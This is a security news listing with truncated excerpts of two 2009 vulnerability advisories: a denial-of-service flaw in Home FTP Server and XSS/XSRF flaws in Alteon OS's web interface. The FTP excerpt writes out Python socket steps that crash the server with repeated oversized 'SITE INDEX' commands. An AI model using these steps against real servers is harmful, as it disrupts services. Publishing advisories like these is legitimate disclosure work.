Date of Discovery: 16-Nov-2009

Credits:zhangmc[at]mail.ustc.edu.cn

Vendor: Ari Pikivirta
http://downstairs.dnsalias.net/homeftpserver.html

Affected:
Home FTP Server 1.10.1.139
Earlier versions may also be affected

Overview:
Home FTP Server FTP Server is an easy use FTP server Application. Denial of service

vulnerability exists in Home FTP Server that causes the application to stop service when we

send multiple irregular "SITE INDEX" commands to the server.

Details:
If you could log on the server successfully, take the following steps and the application

will stop service:

1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.for i in range(1,20):
sock.send("SITE INDEX "+ "a"*30*i +"\r\n")
5.sock.close()

Severity:
High

Exploit example:

#!/usr/bin/python
import socket
import sy ... Read more »

Views: 823 | Added by: apeh1706 | Date: 17 November 2009 | Comments (0)

Digital Security Research Group [DSecRG] Advisory
http://dsecrg.com/pages/vul/show.php?id=161

Various XSS and XSRF vulnerabilities were identified in the Alteon OS Browser-Based
Interface (BBI).

Application: Alteon OS BBI
Versions Affected: <= 21.0.8.3 and may be higher ( <=25.1.0.0 )
Vendor URL: http://www.nortelnetworks.com; http://radware.com
Bug: XSS ans XSRF Vulnerabilities
Exploits: YES
Reported: 11.08.2009
Secondly Reported: 07.09.2009
Final Reported: 28.10.2009
Date of Public Advisory: 16.11.2009
Solution: YES (Non official)
Author: Sintsov Alexey from Digital Security Research Group [DSecRG]

Description
***********

Browser-Based Interface (BBI) software is included in the Nortel Networks(vesrions < 25.0.0.0) and Radware
family of switches. The BBI software lets you use your Web browser to access switch
information and statistics, to perform switch c ... Read more »

Views: 924 | Added by: apeh1706 | Date: 17 November 2009 | Comments (0)

close